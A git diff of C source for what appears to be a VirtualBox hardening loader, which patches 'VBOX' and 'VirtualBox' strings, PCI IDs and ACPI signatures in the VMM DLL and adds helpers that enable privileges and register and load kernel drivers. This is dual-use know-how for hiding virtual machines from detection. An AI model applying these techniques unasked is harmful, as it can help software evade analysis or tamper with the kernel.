DataBlocks[c].VirtualOffset = (ULONG)(Pattern - DllBase);
DataBlocks[c].DataLength = sizeof(JUSTVIRTUALBOX_PATCH);
RtlCopyMemory(DataBlocks[c].Data, JUSTVIRTUALBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("VirtualBox VMM\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
+ PATTERN_FOUND2("VirtualBox VMM", (ULONG)DataBlocks[c].VirtualOffset);
c += 1;
}
else {
- _strcpy(LogBuffer, TEXT("\tPattern VirtualBox VMM not found"));
+ PATTERN_NOT_FOUND("VirtualBox VMM");
}
- cuiPrintText(LogBuffer, TRUE);
//locate Configuration pattern
- cuiPrintText(TEXT("\r\nPattern matching: Configuration\r\n"), TRUE);
+ printf_s("\r\n%s\r\n\r\n", "Pattern matching: 'Configuration'");
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
+ Pattern = supFindPattern(
(CONST PBYTE)DllBase, DllVirtualSize,
(CONST PBYTE)CFGSTRINGS_PATTERN, sizeof(CFGSTRINGS_PATTERN));
if (Pattern) {
DataBlocks[c].VirtualOffset = (ULONG)(26 + Pattern - DllBase);
DataBlocks[c].DataLength = sizeof(CONFIGURATION_PATCH);
RtlCopyMemory(DataBlocks[c].Data, CONFIGURATION_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("Cfg\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
+ PATTERN_FOUND("Configuration (pre 6.1)", (ULONG)DataBlocks[c].VirtualOffset);
+ c += 1;
+ }
+ else {
+ PATTERN_NOT_FOUND("Configuration (pre 6.1)");
+ }
+
+ Pattern = supFindPattern(
+ (CONST PBYTE)DllBase, DllVirtualSize,
+ (CONST PBYTE)CFGSTRINGS_PATTERN_61, sizeof(CFGSTRINGS_PATTERN_61));
+ if (Pattern) {
+ DataBlocks[c].VirtualOffset = (ULONG)(26 + Pattern - DllBase);
+ DataBlocks[c].DataLength = sizeof(CONFIGURATION_PATCH_61);
+ RtlCopyMemory(DataBlocks[c].Data, CONFIGURATION_PATCH_61, DataBlocks[c].DataLength);
+ PATTERN_FOUND("Configuration (6.1+)", (ULONG)DataBlocks[c].VirtualOffset);
c += 1;
}
else {
- _strcpy(LogBuffer, TEXT("\tPattern Configuration not found"));
+ PATTERN_NOT_FOUND("Configuration (6.1+)");
}
- cuiPrintText(LogBuffer, TRUE);
+
//
// HWID
//
- cuiPrintText(TEXT("\r\nPattern matching: Hardware ID\r\n"), TRUE);
+ printf_s("\r\n%s\r\n\r\n", "Pattern matching: Hardware ID");
//
// 80EE
@@ -473,21 +453,18 @@ UINT ProcessVirtualBoxFile(
d = 0;
Pattern = DllBase;
do {
- Pattern = FindPattern(
+ Pattern = supFindPattern(
(CONST PBYTE)Pattern, DllVirtualSize - (Pattern - DllBase),
(CONST PBYTE)PCI80EE_PATTERN, sizeof(PCI80EE_PATTERN));
if (Pattern) {
DataBlocks[c].VirtualOffset = (ULONG)(1 + Pattern - DllBase);
DataBlocks[c].DataLength = sizeof(HWID_PATCH_VIDEO_1);
RtlCopyMemory(DataBlocks[c].Data, HWID_PATCH_VIDEO_1, DataBlocks[c].DataLength);
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- _strcpy(LogBuffer, TEXT("80EE\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- cuiPrintText(LogBuffer, TRUE);
+ PATTERN_FOUND("80EE", (ULONG)DataBlocks[c].VirtualOffset);
c += 1;
d += 1;
if (d > MAX_HWID_BLOCKS_DEEP) {
- cuiPrintText(TEXT("\r\nLdr: Maximum hwid blocks deep, abort scan.\r\n"), TRUE);
+ printf_s("\r\nLDR: Maximum hwid blocks deep, abort scan.\r\n");
break;
}
}
@@ -501,25 +478,21 @@ UINT ProcessVirtualBoxFile(
// BEEF
//
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
d = 0;
Pattern = DllBase;
do {
- Pattern = FindPattern(
+ Pattern = supFindPattern(
(CONST PBYTE)Pattern, DllVirtualSize - (Pattern - DllBase),
(CONST PBYTE)PCIBEEF_PATTERN, sizeof(PCIBEEF_PATTERN));
if (Pattern) {
DataBlocks[c].VirtualOffset = (ULONG)(1 + Pattern - DllBase);
DataBlocks[c].DataLength = sizeof(HWID_PATCH_VIDEO_2);
RtlCopyMemory(DataBlocks[c].Data, HWID_PATCH_VIDEO_2, DataBlocks[c].DataLength);
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- _strcpy(LogBuffer, TEXT("BEEF\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
- cuiPrintText(LogBuffer, TRUE);
+ PATTERN_FOUND("BEEF", (ULONG)DataBlocks[c].VirtualOffset);
c += 1;
d += 1;
if (d > MAX_HWID_BLOCKS_DEEP) {
- cuiPrintText(TEXT("\r\nLdr: Maximum hwid blocks deep, abort scan.\r\n"), TRUE);
+ printf_s("\r\nLDR: Maximum hwid blocks deep, abort scan.\r\n");
break;
}
}
@@ -532,29 +505,26 @@ UINT ProcessVirtualBoxFile(
//
// CAFE
//
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
+ Pattern = supFindPattern(
(CONST PBYTE)DllBase, DllVirtualSize,
(CONST PBYTE)PCICAFE_PATTERN, sizeof(PCICAFE_PATTERN));
if (Pattern) {
DataBlocks[c].VirtualOffset = (ULONG)(1 + Pattern - DllBase);
DataBlocks[c].DataLength = sizeof(HWID_PATCH);
RtlCopyMemory(DataBlocks[c].Data, HWID_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("CAFE\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
+ PATTERN_FOUND("CAFE", (ULONG)DataBlocks[c].VirtualOffset);
c += 1;
}
else {
- _strcpy(LogBuffer, TEXT("\tPattern CAFE not found"));
+ PATTERN_NOT_FOUND("CAFE");
}
- cuiPrintText(LogBuffer, TRUE);
if (BuildTable(DataBlocks, c, OutputBuffer, OutputBufferSize))
uResult = 0;
else
uResult = (UINT)-2;
- } while (cond);
+ } while (FALSE);
if (usFileName.Buffer != NULL) {
RtlFreeUnicodeString(&usFileName);
diff --git a/Source/Zekamashi/loader/patterns.h b/Source/Zekamashi_v2/loader/patterns.h
similarity index 77%
rename from Source/Zekamashi/loader/patterns.h
rename to Source/Zekamashi_v2/loader/patterns.h
index c1a2f57..e21ca1e 100644
--- a/Source/Zekamashi/loader/patterns.h
+++ b/Source/Zekamashi_v2/loader/patterns.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2017 - 2018
+* (C) COPYRIGHT AUTHORS, 2017 - 2020
*
* TITLE: PATTERNS.H
*
-* VERSION: 1.90
+* VERSION: 2.00
*
-* DATE: 11 Jan 2018
+* DATE: 24 Jan 2020
*
* Search patterns and patches header file.
*
@@ -44,8 +44,17 @@ static const unsigned char JUSTVIRTUALBOX_PATCH[] = {
0x4D, 0x61, 0x67, 0x69, 0x63, 0x61, 0x6C, 0x52 };
static const unsigned char CONFIGURATION_PATCH[] = {
- 0x44, 0x73, 0x64, 0x74, 0x46, 0x69, 0x6C, 0x65, 0x50, 0x61, 0x74, 0x68, 0x00, 0x53,
- 0x73, 0x64, 0x74, 0x46, 0x69, 0x6C, 0x65, 0x50, 0x61, 0x74, 0x68, 0x00, 0x00 };
+ 0x44, 0x73, 0x64, 0x74, 0x46, 0x69, 0x6C, 0x65,
+ 0x50, 0x61, 0x74, 0x68, 0x00, 0x53, 0x73, 0x64,
+ 0x74, 0x46, 0x69, 0x6C, 0x65, 0x50, 0x61, 0x74,
+ 0x68, 0x00, 0x00 };
+
+static const unsigned char CONFIGURATION_PATCH_61[] = {
+ 0x7C, 0x44, 0x73, 0x64, 0x74, 0x46, 0x69, 0x6C,
+ 0x65, 0x50, 0x61, 0x74, 0x68, 0x7C, 0x53, 0x73,
+ 0x64, 0x74, 0x46, 0x69, 0x6C, 0x65, 0x50, 0x61,
+ 0x74, 0x68, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
+};
static const unsigned char HWID_PATCH_VIDEO_1[] = { 0xDE, 0x10 };
@@ -60,11 +69,21 @@ static const unsigned char FACP_PATTERN[] = {
0x89, 0x45, 0x90, 0xC7, 0x44, 0x24, 0x34, 0x46,
0x41, 0x43, 0x50 };
+static const unsigned char FACP_PATTERN_61[] = {
+ 0xC7, 0x44, 0x24, 0x30, 0x56, 0x42, 0x4F, 0x58,
+ 0x41, 0x0F, 0x45, 0xC6, 0xC7, 0x44, 0x24, 0x34,
+ 0x46, 0x41, 0x43, 0x50 };
+
static const unsigned char RSDT_PATTERN[] = {
0xC7, 0x47, 0x10, 0x56, 0x42, 0x4F, 0x58, 0xC7,
0x47, 0x14, 0x52, 0x53, 0x44, 0x54
};
+static const unsigned char RSDT_PATTERN_61[] = {
+ 0xC7, 0x43, 0x10, 0x56, 0x42, 0x4F, 0x58, 0xC7,
+ 0x43, 0x14, 0x52, 0x53, 0x44, 0x54
+};
+
static const unsigned char XSDT_PATTERN[] = {
0xC7, 0x43, 0x10, 0x56, 0x42, 0x4F, 0x58, 0xC7,
0x43, 0x14, 0x58, 0x53, 0x44, 0x54
@@ -95,6 +114,11 @@ static const unsigned char JUSTVBOX_PATTERN[] = {
0xC7, 0x81, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01
};
+static const unsigned char JUSTVBOX_PATTERN_61[] = {
+ 0x41, 0xC7, 0x01, 0x56, 0x42, 0x4F, 0x58, 0x66,
+ 0xC7, 0x00, 0x00, 0x01, 0x33, 0xc0, 0xc3
+};
+
static const unsigned char JUSTVIRTUALBOX_PATTERN[] = {
0x56, 0x69, 0x72, 0x74, 0x75, 0x61, 0x6C, 0x42,
0x6F, 0x78, 0x00
@@ -124,6 +148,13 @@ static const unsigned char CFGSTRINGS_PATTERN[] = {
0x71, 0x00, 0x00
};
+static const unsigned char CFGSTRINGS_PATTERN_61[] = {
+ 0x7C, 0x50, 0x61, 0x72, 0x61, 0x6C, 0x6C, 0x65,
+ 0x6C, 0x30, 0x49, 0x72, 0x71, 0x7C, 0x50, 0x61,
+ 0x72, 0x61, 0x6C, 0x6C, 0x65, 0x6C, 0x31, 0x49,
+ 0x72, 0x71, 0x00, 0x00
+};
+
/*static const unsigned char CDROMVBOX_PATTERN[] = {
0x31, 0x2E, 0x30, 0x00, 0x43, 0x44, 0x2D, 0x52,
0x4F, 0x4D, 0x00, 0x00, 0x56, 0x42, 0x4F, 0x58,
diff --git a/Source/Kasumi/VBoxPatchGen/resource.h b/Source/Zekamashi_v2/loader/resource.h
similarity index 71%
rename from Source/Kasumi/VBoxPatchGen/resource.h
rename to Source/Zekamashi_v2/loader/resource.h
index 7ca31da..1225e5a 100644
--- a/Source/Kasumi/VBoxPatchGen/resource.h
+++ b/Source/Zekamashi_v2/loader/resource.h
@@ -1,12 +1,15 @@
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by Resource.rc
+//
+#define IDR_PROCEXP 101
+#define IDR_iQVM64 102
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
-#define _APS_NEXT_RESOURCE_VALUE 101
+#define _APS_NEXT_RESOURCE_VALUE 103
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
diff --git a/Source/Zekamashi_v2/loader/sup.c b/Source/Zekamashi_v2/loader/sup.c
new file mode 100644
index 0000000..4651ac0
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/sup.c
@@ -0,0 +1,1496 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2014 - 2020
+*
+* TITLE: SUP.C
+*
+* VERSION: 2.00
+*
+* DATE: 24 Jan 2020
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#include "global.h"
+
+/*
+* supHeapAlloc
+*
+* Purpose:
+*
+* Wrapper for RtlAllocateHeap with WinObjEx heap.
+*
+*/
+PVOID supHeapAlloc(
+ _In_ SIZE_T Size)
+{
+ return RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, Size);
+}
+
+/*
+* supHeapFree
+*
+* Purpose:
+*
+* Wrapper for RtlFreeHeap with WinObjEx heap.
+*
+*/
+BOOL supHeapFree(
+ _In_ PVOID Memory)
+{
+ return RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Memory);
+}
+
+/*
+* supPurgeSystemCache
+*
+* Purpose:
+*
+* Flush file cache and memory standby list.
+*
+*/
+VOID supPurgeSystemCache(
+ VOID
+)
+{
+ SYSTEM_FILECACHE_INFORMATION sfc;
+ SYSTEM_MEMORY_LIST_COMMAND smlc;
+
+ //flush file system cache
+ if (NT_SUCCESS(supEnablePrivilege(SE_INCREASE_QUOTA_PRIVILEGE, TRUE))) {
+ RtlSecureZeroMemory(&sfc, sizeof(SYSTEM_FILECACHE_INFORMATION));
+ sfc.MaximumWorkingSet = (SIZE_T)-1;
+ sfc.MinimumWorkingSet = (SIZE_T)-1;
+ NtSetSystemInformation(SystemFileCacheInformation, &sfc, sizeof(sfc));
+ }
+
+ //flush standby list
+ if (NT_SUCCESS(supEnablePrivilege(SE_PROF_SINGLE_PROCESS_PRIVILEGE, TRUE))) {
+ smlc = MemoryPurgeStandbyList;
+ NtSetSystemInformation(SystemMemoryListInformation, &smlc, sizeof(smlc));
+ }
+}
+
+/*
+* supxDeleteKeyRecursive
+*
+* Purpose:
+*
+* Delete key and all it subkeys/values.
+*
+*/
+BOOL supxDeleteKeyRecursive(
+ _In_ HKEY hKeyRoot,
+ _In_ LPWSTR lpSubKey)
+{
+ LPWSTR lpEnd;
+ LONG lResult;
+ DWORD dwSize;
+ WCHAR szName[MAX_PATH + 1];
+ HKEY hKey;
+ FILETIME ftWrite;
+
+ //
+ // Attempt to delete key as is.
+ //
+ lResult = RegDeleteKey(hKeyRoot, lpSubKey);
+ if (lResult == ERROR_SUCCESS)
+ return TRUE;
+
+ //
+ // Try to open key to check if it exist.
+ //
+ lResult = RegOpenKeyEx(hKeyRoot, lpSubKey, 0, KEY_READ, &hKey);
+ if (lResult != ERROR_SUCCESS) {
+ if (lResult == ERROR_FILE_NOT_FOUND)
+ return TRUE;
+ else
+ return FALSE;
+ }
+
+ //
+ // Add slash to the key path if not present.
+ //
+ lpEnd = _strend(lpSubKey);
+ if (*(lpEnd - 1) != TEXT('\\')) {
+ *lpEnd = TEXT('\\');
+ lpEnd++;
+ *lpEnd = TEXT('\0');
+ }
+
+ //
+ // Enumerate subkeys and call this func for each.
+ //
+ dwSize = MAX_PATH;
+ lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, NULL,
+ NULL, NULL, &ftWrite);
+
+ if (lResult == ERROR_SUCCESS) {
+
+ do {
+
+ _strncpy(lpEnd, MAX_PATH, szName, MAX_PATH);
+
+ if (!supxDeleteKeyRecursive(hKeyRoot, lpSubKey))
+ break;
+
+ dwSize = MAX_PATH;
+
+ lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, NULL,
+ NULL, NULL, &ftWrite);
+
+ } while (lResult == ERROR_SUCCESS);
+ }
+
+ lpEnd--;
+ *lpEnd = TEXT('\0');
+
+ RegCloseKey(hKey);
+
+ //
+ // Delete current key, all it subkeys should be already removed.
+ //
+ lResult = RegDeleteKey(hKeyRoot, lpSubKey);
+ if (lResult == ERROR_SUCCESS)
+ return TRUE;
+
+ return FALSE;
+}
+
+/*
+* supRegDeleteKeyRecursive
+*
+* Purpose:
+*
+* Delete key and all it subkeys/values.
+*
+* Remark:
+*
+* SubKey should not be longer than 260 chars.
+*
+*/
+BOOL supRegDeleteKeyRecursive(
+ _In_ HKEY hKeyRoot,
+ _In_ LPWSTR lpSubKey)
+{
+ WCHAR szKeyName[MAX_PATH * 2];
+ RtlSecureZeroMemory(szKeyName, sizeof(szKeyName));
+ _strncpy(szKeyName, MAX_PATH * 2, lpSubKey, MAX_PATH);
+ return supxDeleteKeyRecursive(hKeyRoot, szKeyName);
+}
+
+/*
+* supEnablePrivilege
+*
+* Purpose:
+*
+* Enable/Disable given privilege.
+*
+* Return NTSTATUS value.
+*
+*/
+NTSTATUS supEnablePrivilege(
+ _In_ DWORD Privilege,
+ _In_ BOOL Enable
+)
+{
+ ULONG Length;
+ NTSTATUS Status;
+ HANDLE TokenHandle;
+ LUID LuidPrivilege;
+
+ PTOKEN_PRIVILEGES NewState;
+ UCHAR Buffer[sizeof(TOKEN_PRIVILEGES) + sizeof(LUID_AND_ATTRIBUTES)];
+
+ Status = NtOpenProcessToken(
+ NtCurrentProcess(),
+ TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
+ &TokenHandle);
+
+ if (!NT_SUCCESS(Status)) {
+ return Status;
+ }
+
+ NewState = (PTOKEN_PRIVILEGES)Buffer;
+
+ LuidPrivilege = RtlConvertUlongToLuid(Privilege);
+
+ NewState->PrivilegeCount = 1;
+ NewState->Privileges[0].Luid = LuidPrivilege;
+ NewState->Privileges[0].Attributes = Enable ? SE_PRIVILEGE_ENABLED : 0;
+
+ Status = NtAdjustPrivilegesToken(TokenHandle,
+ FALSE,
+ NewState,
+ sizeof(Buffer),
+ NULL,
+ &Length);
+
+ if (Status == STATUS_NOT_ALL_ASSIGNED) {
+ Status = STATUS_PRIVILEGE_NOT_HELD;
+ }
+
+ NtClose(TokenHandle);
+ return Status;
+}
+
+/*
+* supCopyMemory
+*
+* Purpose:
+*
+* Copies bytes between buffers.
+*
+* dest - Destination buffer
+* cbdest - Destination buffer size in bytes
+* src - Source buffer
+* cbsrc - Source buffer size in bytes
+*
+*/
+void supCopyMemory(
+ _Inout_ void* dest,
+ _In_ size_t cbdest,
+ _In_ const void* src,
+ _In_ size_t cbsrc
+)
+{
+ char* d = (char*)dest;
+ char* s = (char*)src;
+
+ if ((dest == 0) || (src == 0) || (cbdest == 0))
+ return;
+ if (cbdest < cbsrc)
+ cbsrc = cbdest;
+
+ while (cbsrc > 0) {
+ *d++ = *s++;
+ cbsrc--;
+ }
+}
+
+/*
+* supGetSystemInfo
+*
+* Purpose:
+*
+* Wrapper for NtQuerySystemInformation.
+*
+*/
+PVOID supGetSystemInfo(
+ _In_ SYSTEM_INFORMATION_CLASS InfoClass
+)
+{
+ INT c = 0;
+ PVOID Buffer = NULL;
+ ULONG Size = 0x1000;
+ NTSTATUS status;
+ ULONG memIO;
+
+ do {
+ Buffer = supHeapAlloc((SIZE_T)Size);
+ if (Buffer != NULL) {
+ status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO);
+ }
+ else {
+ return NULL;
+ }
+ if (status == STATUS_INFO_LENGTH_MISMATCH) {
+ supHeapFree(Buffer);
+ Buffer = NULL;
+ Size *= 2;
+ c++;
+ if (c > 100) {
+ status = STATUS_SECRET_TOO_LONG;
+ break;
+ }
+ }
+ } while (status == STATUS_INFO_LENGTH_MISMATCH);
+
+ if (NT_SUCCESS(status)) {
+ return Buffer;
+ }
+
+ if (Buffer) {
+ supHeapFree(Buffer);
+ }
+ return NULL;
+}
+
+/*
+* supProcessExist
+*
+* Purpose:
+*
+* Return TRUE if specified process launched, FALSE otherwise or on error.
+*
+*/
+BOOL supProcessExist(
+ _In_ LPWSTR lpProcessName
+)
+{
+ PSYSTEM_PROCESSES_INFORMATION ProcessList, pList;
+ UNICODE_STRING procName;
+ BOOL bResult = FALSE;
+
+ ProcessList = (PSYSTEM_PROCESSES_INFORMATION)supGetSystemInfo(SystemProcessInformation);
+ if (ProcessList == NULL) {
+ return bResult;
+ }
+
+ do {
+ RtlSecureZeroMemory(&procName, sizeof(procName));
+ RtlInitUnicodeString(&procName, lpProcessName);
+ pList = ProcessList;
+
+ for (;;) {
+ if (RtlEqualUnicodeString(&procName, &pList->ImageName, TRUE)) {
+ bResult = TRUE;
+ break;
+ }
+ if (pList->NextEntryDelta == 0) {
+ break;
+ }
+ pList = (PSYSTEM_PROCESSES_INFORMATION)(((LPBYTE)pList) + pList->NextEntryDelta);
+ }
+
+ } while (FALSE);
+
+ supHeapFree(ProcessList);
+ return bResult;
+}
+
+/*
+* supxCreateDriverEntry
+*
+* Purpose:
+*
+* Creating registry entry for driver.
+*
+*/
+NTSTATUS supxCreateDriverEntry(
+ _In_opt_ LPCWSTR DriverPath,
+ _In_ LPCWSTR KeyName
+)
+{
+ NTSTATUS status = STATUS_UNSUCCESSFUL;
+ DWORD dwData, dwResult;
+ HKEY keyHandle = NULL;
+ UNICODE_STRING driverImagePath;
+
+ RtlInitEmptyUnicodeString(&driverImagePath, NULL, 0);
+
+ if (DriverPath) {
+ if (!RtlDosPathNameToNtPathName_U(DriverPath,
+ &driverImagePath,
+ NULL,
+ NULL))
+ {
+ return STATUS_INVALID_PARAMETER_2;
+ }
+ }
+
+ if (ERROR_SUCCESS != RegCreateKeyEx(HKEY_LOCAL_MACHINE,
+ KeyName,
+ 0,
+ NULL,
+ REG_OPTION_NON_VOLATILE,
+ KEY_ALL_ACCESS,
+ NULL,
+ &keyHandle,
+ NULL))
+ {
+ status = STATUS_ACCESS_DENIED;
+ goto Cleanup;
+ }
+
+ dwResult = ERROR_SUCCESS;
+
+ do {
+
+ dwData = SERVICE_ERROR_NORMAL;
+ dwResult = RegSetValueEx(keyHandle,
+ TEXT("ErrorControl"),
+ 0,
+ REG_DWORD,
+ (BYTE*)&dwData,
+ sizeof(dwData));
+ if (dwResult != ERROR_SUCCESS)
+ break;
+
+ dwData = SERVICE_KERNEL_DRIVER;
+ dwResult = RegSetValueEx(keyHandle,
+ TEXT("Type"),
+ 0,
+ REG_DWORD,
+ (BYTE*)&dwData,
+ sizeof(dwData));
+ if (dwResult != ERROR_SUCCESS)
+ break;
+
+ dwData = SERVICE_DEMAND_START;
+ dwResult = RegSetValueEx(keyHandle,
+ TEXT("Start"),
+ 0,
+ REG_DWORD,
+ (BYTE*)&dwData,
+ sizeof(dwData));
+
+ if (dwResult != ERROR_SUCCESS)
+ break;
+
+ if (DriverPath) {
+ dwResult = RegSetValueEx(keyHandle,
+ TEXT("ImagePath"),
+ 0,
+ REG_EXPAND_SZ,
+ (BYTE*)driverImagePath.Buffer,
+ (DWORD)driverImagePath.Length + sizeof(UNICODE_NULL));
+ }
+
+ } while (FALSE);
+
+ RegCloseKey(keyHandle);
+
+ if (dwResult != ERROR_SUCCESS) {
+ status = STATUS_ACCESS_DENIED;
+ }
+ else
+ {
+ status = STATUS_SUCCESS;
+ }
+
+Cleanup:
+ if (DriverPath) {
+ if (driverImagePath.Buffer) {
+ RtlFreeUnicodeString(&driverImagePath);
+ }
+ }
+ return status;
+}
+
+/*
+* supLoadDriver
+*
+* Purpose:
+*
+* Install driver and load it.
+*
+* N.B.
+* SE_LOAD_DRIVER_PRIVILEGE is required to be assigned and enabled.
+*
+*/
+NTSTATUS supLoadDriver(
+ _In_ LPCWSTR DriverName,
+ _In_ LPCWSTR DriverPath,
+ _In_ BOOLEAN UnloadPreviousInstance
+)
+{
+ SIZE_T keyOffset;
+ NTSTATUS status = STATUS_UNSUCCESSFUL;
+ UNICODE_STRING driverServiceName;
+
+ WCHAR szBuffer[MAX_PATH + 1];
+
+ if (DriverName == NULL)
+ return STATUS_INVALID_PARAMETER_1;
+ if (DriverPath == NULL)
+ return STATUS_INVALID_PARAMETER_2;
+
+ RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
+
+ keyOffset = RTL_NUMBER_OF(NT_REG_PREP);
+
+ if (FAILED(StringCchPrintf(szBuffer, MAX_PATH,
+ DRIVER_REGKEY,
+ NT_REG_PREP,
+ DriverName)))
+ {
+ return STATUS_INVALID_PARAMETER_1;
+ }
+
+ status = supxCreateDriverEntry(DriverPath,
+ &szBuffer[keyOffset]);
+
+ if (!NT_SUCCESS(status))
+ return status;
+
+ RtlInitUnicodeString(&driverServiceName, szBuffer);
+ status = NtLoadDriver(&driverServiceName);
+
+ if (UnloadPreviousInstance) {
+ if ((status == STATUS_IMAGE_ALREADY_LOADED) ||
+ (status == STATUS_OBJECT_NAME_COLLISION) ||
+ (status == STATUS_OBJECT_NAME_EXISTS))
+ {
+ status = NtUnloadDriver(&driverServiceName);
+ if (NT_SUCCESS(status)) {
+ status = NtLoadDriver(&driverServiceName);
+ }
+ }
+ }
+ else {
+ if (status == STATUS_OBJECT_NAME_EXISTS)
+ status = STATUS_SUCCESS;
+ }
+
+ return status;
+}
+
+/*
+* supUnloadDriver
+*
+* Purpose:
+*
+* Call driver unload and remove corresponding registry key.
+*
+* N.B.
+* SE_LOAD_DRIVER_PRIVILEGE is required to be assigned and enabled.
+*
+*/
+NTSTATUS supUnloadDriver(
+ _In_ LPCWSTR DriverName,
+ _In_ BOOLEAN fRemove
+)
+{
+ NTSTATUS status;
+ SIZE_T keyOffset;
+ UNICODE_STRING driverServiceName;
+
+ WCHAR szBuffer[MAX_PATH + 1];
+
+ RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
+
+ if (FAILED(StringCchPrintf(szBuffer, MAX_PATH,
+ DRIVER_REGKEY,
+ NT_REG_PREP,
+ DriverName)))
+ {
+ return STATUS_INVALID_PARAMETER_1;
+ }
+
+ keyOffset = RTL_NUMBER_OF(NT_REG_PREP);
+
+ status = supxCreateDriverEntry(NULL,
+ &szBuffer[keyOffset]);
+
+ if (!NT_SUCCESS(status))
+ return status;
+
+ RtlInitUnicodeString(&driverServiceName, szBuffer);
+ status = NtUnloadDriver(&driverServiceName);
+
+ if (NT_SUCCESS(status)) {
+ if (fRemove)
+ supRegDeleteKeyRecursive(HKEY_LOCAL_MACHINE, &szBuffer[keyOffset]);
+ }
+
+ return status;
+}
+
+/*
+* supOpenDriver
+*
+* Purpose:
+*
+* Open handle for helper driver.
+*
+*/
+NTSTATUS supOpenDriver(
+ _In_ LPCWSTR DriverName,
+ _Out_ PHANDLE DeviceHandle
+)
+{
+ NTSTATUS status = STATUS_UNSUCCESSFUL;
+
+ UNICODE_STRING usDeviceLink;
+ OBJECT_ATTRIBUTES obja;
+ IO_STATUS_BLOCK iost;
+
+ TCHAR szDeviceLink[MAX_PATH + 1];
+
+ // assume failure
+ if (DeviceHandle)
+ *DeviceHandle = NULL;
+ else
+ return STATUS_INVALID_PARAMETER_2;
+
+ if (DriverName) {
+
+ RtlSecureZeroMemory(szDeviceLink, sizeof(szDeviceLink));
+
+ if (FAILED(StringCchPrintf(szDeviceLink,
+ MAX_PATH,
+ TEXT("\\DosDevices\\%wS"),
+ DriverName)))
+ {
+ return STATUS_INVALID_PARAMETER_1;
+ }
+
+ RtlInitUnicodeString(&usDeviceLink, szDeviceLink);
+ InitializeObjectAttributes(&obja, &usDeviceLink, OBJ_CASE_INSENSITIVE, NULL, NULL);
+
+ status = NtCreateFile(DeviceHandle,
+ GENERIC_READ | GENERIC_WRITE,
+ &obja,
+ &iost,
+ NULL,
+ 0,
+ 0,
+ FILE_OPEN,
+ 0,
+ NULL,
+ 0);
+
+ }
+ else {
+ status = STATUS_INVALID_PARAMETER_1;
+ }
+
+ return status;
+}
+
+/*
+* supGetNtOsBase
+*
+* Purpose:
+*
+* Return ntoskrnl base address.
+*
+*/
+ULONG_PTR supGetNtOsBase(
+ VOID
+)
+{
+ PRTL_PROCESS_MODULES miSpace;
+ ULONG_PTR NtOsBase = 0;
+
+ miSpace = (PRTL_PROCESS_MODULES)supGetSystemInfo(SystemModuleInformation);
+ if (miSpace) {
+ NtOsBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
+ RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace);
+ }
+ return NtOsBase;
+}
+
+/*
+* supQueryResourceData
+*
+* Purpose:
+*
+* Load resource by given id (win32 FindResource, SizeofResource, LockResource).
+*
+*/
+PBYTE supQueryResourceData(
+ _In_ ULONG_PTR ResourceId,
+ _In_ PVOID DllHandle,
+ _In_ PULONG DataSize
+)
+{
+ NTSTATUS status;
+ ULONG_PTR IdPath[3];
+ IMAGE_RESOURCE_DATA_ENTRY* DataEntry;
+ PBYTE Data = NULL;
+ ULONG SizeOfData = 0;
+
+ if (DllHandle != NULL) {
+
+ IdPath[0] = (ULONG_PTR)RT_RCDATA; //type
+ IdPath[1] = ResourceId; //id
+ IdPath[2] = 0; //lang
+
+ status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry);
+ if (NT_SUCCESS(status)) {
+ status = LdrAccessResource(DllHandle, DataEntry, (PVOID*)&Data, &SizeOfData);
+ if (NT_SUCCESS(status)) {
+ if (DataSize) {
+ *DataSize = SizeOfData;
+ }
+ }
+ }
+ }
+ return Data;
+}
+
+/*
+* supWriteBufferToFile
+*
+* Purpose:
+*
+* Create new file (or open existing) and write (append) buffer to it.
+*
+*/
+SIZE_T supWriteBufferToFile(
+ _In_ PWSTR lpFileName,
+ _In_ PVOID Buffer,
+ _In_ SIZE_T Size,
+ _In_ BOOL Flush,
+ _In_ BOOL Append,
+ _Out_opt_ NTSTATUS* Result
+)
+{
+ NTSTATUS Status = STATUS_UNSUCCESSFUL;
+ DWORD dwFlag;
+ HANDLE hFile = NULL;
